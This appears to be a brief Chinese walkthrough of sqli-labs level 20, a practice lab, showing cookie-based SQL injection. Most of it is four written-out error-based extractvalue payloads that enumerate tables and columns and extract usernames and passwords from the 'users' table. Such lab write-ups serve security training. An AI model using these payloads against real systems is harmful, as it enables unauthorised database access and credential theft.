Sqlilabs-20

十大关一关卡，小试牛刀来到了第 20 关：
Sqlilabs-20

本关还是在 HTTP HEADRE 做文章，具体为 COOKIE
先输入正确的用户名和密码，进入界面看看：

Sqlilabs-20

通过观察我们可以看到具体的 payload 该如何构造
把 hackbar 的 cookie 栏调出来：
Sqlilabs-20

–查表
uname=admin' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))#

–查列
uname=admin' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1),0x7e))#

–查数据
uname=admin' and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))#
uname=admin' and extractvalue(1,concat(0x7e,(select password from users limit 0,1),0x7e))#

????

相关推荐